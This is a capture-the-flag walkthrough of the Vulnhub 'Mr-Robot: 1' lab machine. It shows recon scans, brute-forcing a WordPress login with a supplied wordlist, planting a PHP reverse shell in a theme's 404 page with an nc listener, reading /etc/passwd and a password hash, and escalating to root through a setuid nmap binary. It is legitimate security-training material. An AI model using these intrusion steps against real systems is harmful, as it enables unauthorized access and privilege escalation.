Got some free time, booted up another Vulnhub virtual machine. This time we’ll be playing with Mr-Robot: 1.

Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

To start, let’s identify the target address:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #netdiscover -i eth0 -r 192.168.88.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                               
                                                                                             
 37 Captured ARP Req/Rep packets, from 14 hosts.   Total size: 2220                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.88.11   00:0c:29:5d:a2:fd      1      60  VMware, Inc.

Now a simple enumeration, looking for open ports.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #nmap -oA nmap-simple-mrrobot 192.168.88.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-03 12:35 -03
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 12:35 (0:00:00 remaining)
Nmap scan report for 192.168.88.11
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 00:0C:29:5D:A2:FD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.65 seconds

Got a few. Now I’ll go for nmap scripts and version checking.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #nmap -p22,80,443 -sC -sV --version-all -oA nmap-sC-mrrobot 192.168.88.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-04 08:59 -03
Nmap scan report for 192.168.88.11
Host is up (0.00055s latency).

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 00:0C:29:5D:A2:FD (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.06 seconds

Ok, it doesn’t tell us much else. Let’s take a look with the browser and see what Apache is serving.

http://192.168.88.11/

Oh, cool, a web terminal, some available commands that let you kid arround but not much else, not really useful.
As we have a web page up, we can also check for robots.txt to see if there’s something there.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #curl http://192.168.88.11/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

Look at that! Seems we already found a key, and some other file. Can we read these?

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #curl http://192.168.88.11/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Yass! I’ll just make a local copy.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wget http://192.168.88.11/key-1-of-3.txt
--2019-06-04 09:04:17--  http://192.168.88.11/key-1-of-3.txt
Connecting to 192.168.88.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’

key-1-of-3.txt          100%[=============================>]      33  --.-KB/s    in 0s      

2019-06-04 09:04:17 (6.65 MB/s) - ‘key-1-of-3.txt’ saved [33/33]

I’ll also download this other file:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wget http://192.168.88.11/fsocity.dic
--2019-06-04 09:37:29--  http://192.168.88.11/fsocity.dic
Connecting to 192.168.88.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’

fsocity.dic             100%[=============================>]   6.91M  --.-KB/s    in 0.07s   

2019-06-04 09:37:29 (96.5 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]

I opened the file and it’s a dictionary. You guessed that but I had to check. Quickly scrolling through it I was able to see some duplicate entries. I’ll see how may entries are we dealing with:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wc -l fsocity.dic 
858160 fsocity.dic

And now onto removing duplicates. We can use ‘sort’ to shorten this list.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #cat fsocity.dic | sort -u > fsocity-u.dic

Another size check.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wc -l fsocity-u.dic 
11451 fsocity-u.dic

Okay, we shrinked the dictionary to a more reasonable size, but I still have no idea were to use it. Lets set it aside for later and keep enumerating:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #nikto -h http://192.168.88.11 -output nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.88.11
+ Target Hostname:    192.168.88.11
+ Target Port:        80
+ Start Time:         2019-06-04 09:05:03 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.88.11/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /wordpresswp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ /wordpresswp-login.php: WordPress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2019-06-04 09:16:01 (GMT-3) (658 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Found some WordPress installation, interesting right? Moving on…

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #gobuster -w /usr/share/wordlists/dirb/big.txt -u http://192.168.88.11 -o gobuster.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.88.11/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/06/04 09:06:11 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/0000 (Status: 301)
/Image (Status: 301)
/admin (Status: 301)
/atom (Status: 301)
/audio (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/image (Status: 301)
/images (Status: 301)
/intro (Status: 200)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/rdf (Status: 301)
/readme (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-config (Status: 200)
/wp-includes (Status: 301)
/wp-login (Status: 200)
=====================================================
2019/06/04 09:14:51 Finished
=====================================================

So far we got a flag, a dictionary that had duplicate entries (already cleaned up) and discovered a wordpress installed along with some other directories.
Let’s run wpscan to enumerate further.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wpscan --url http://192.168.88.11/ --enumerate u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.5.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.88.11/
[+] Started: Tue Jun  4 10:21:02 2019

...

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[+] Finished: Tue Jun  4 10:21:04 2019
[+] Requests Done: 13
[+] Cached Requests: 49
[+] Data Sent: 2.503 KB
[+] Data Received: 20.305 KB
[+] Memory used: 84.137 MB
[+] Elapsed time: 00:00:01

Wait, what if I used that dictionary here?

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wpscan --url 192.168.88.11 -U ./fsocity-u.dic -P ./fsocity-u.dic
...
Progress Time: 00:30:04 <====== > (2454 / 11451) 21.43%  ETA: 01:50:16
Progress Time: 02:15:41 <=============================> (11451 / 11451) 100.00% Time: 02:15:41

[i] No Valid Passwords Found.

[+] Finished: Tue Jun  4 12:38:09 2019
[+] Requests Done: 11392
[+] Cached Requests: 114
[+] Data Sent: 2.878 MB
[+] Data Received: 7.142 MB
[+] Memory used: 280.406 MB
[+] Elapsed time: 02:15:42

This process is taking so much time, there must be a better/faster way…

Knowing a bit about the show wouldn’t harm, right? Lucky shot for username, let’s try the series main character:

http://192.168.88.11/wp-login.php

Bonsoir Elliot! We found a valid user. That’s nice. This speeds up the things.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #wpscan --url 192.168.88.11 -U 'elliot' -P './fsocity-u.dic'

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - elliot / ER28-0652                                                                
All Found                                                                                     
Progress Time: 00:00:14 <=================== > (12 / 22) 54.54%  ETA: ??:??:??

[i] Valid Combinations Found:
 | Username: elliot, Password: ER28-0652

A lot faster. Okay, now we are in. I’ll edit the hello dolly plugin and put the php-reverse-shell there.

… and then I broke the hello dolly plugin. It rarely works as intended and I don’t know why I keep using this plugin.
Anyway, decided to edit the 404 page for the current theme:

Now before accessing any inexistent page, let me fire the nc:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/mrrobot]
└──╼ #nc -lvp 4321
listening on [any] 4321 ...
192.168.88.11: inverse host lookup failed: Unknown host
connect to [192.168.88.16] from (UNKNOWN) [192.168.88.11] 45347
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 14:43:56 up  2:49,  0 users,  load average: 0.02, 0.09, 0.13
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$

We got a shell! Spawning a python fully interactive tty:

$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$

Out of curiosity, checking the passwd for some users …

daemon@linux:/home/robot$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:

… and taking a look on what we have laying around:

daemon@linux:/home/robot$ ls -lrtha
ls -lrtha
total 16K
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

Oi mate, another flag? But I am not with the right user. This daemon isn’t allowed to read the flag, but all groups can read the password.raw-md5.

daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

A hash needs to be decrypted. Instead of using john the ripper or hashcat, let me look for an already decrypted hash on the interwebs.

https://www.md5online.org/md5-decrypt.html

Big success! So we just switch user to robot:

daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

Now we can read that flag:

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Two flags done, one to go. How we priv esc here?

robot@linux:/$ uname -a
uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

I was ready to give dirty c0w a try but decided for something else first. Looking for something with elevated permissions:

robot@linux:~$ find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 13628 May 31 13:28 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 May 31 13:28 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown

Look at that! nmap per se is already unusual to be present in a machine but with a setuid on, it’s a gift. any user running that executable will get the permissions of the individual or group that owns the file.

robot@linux:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh

# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

# ls /root  
ls /root
firstboot_done	key-3-of-3.txt

# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4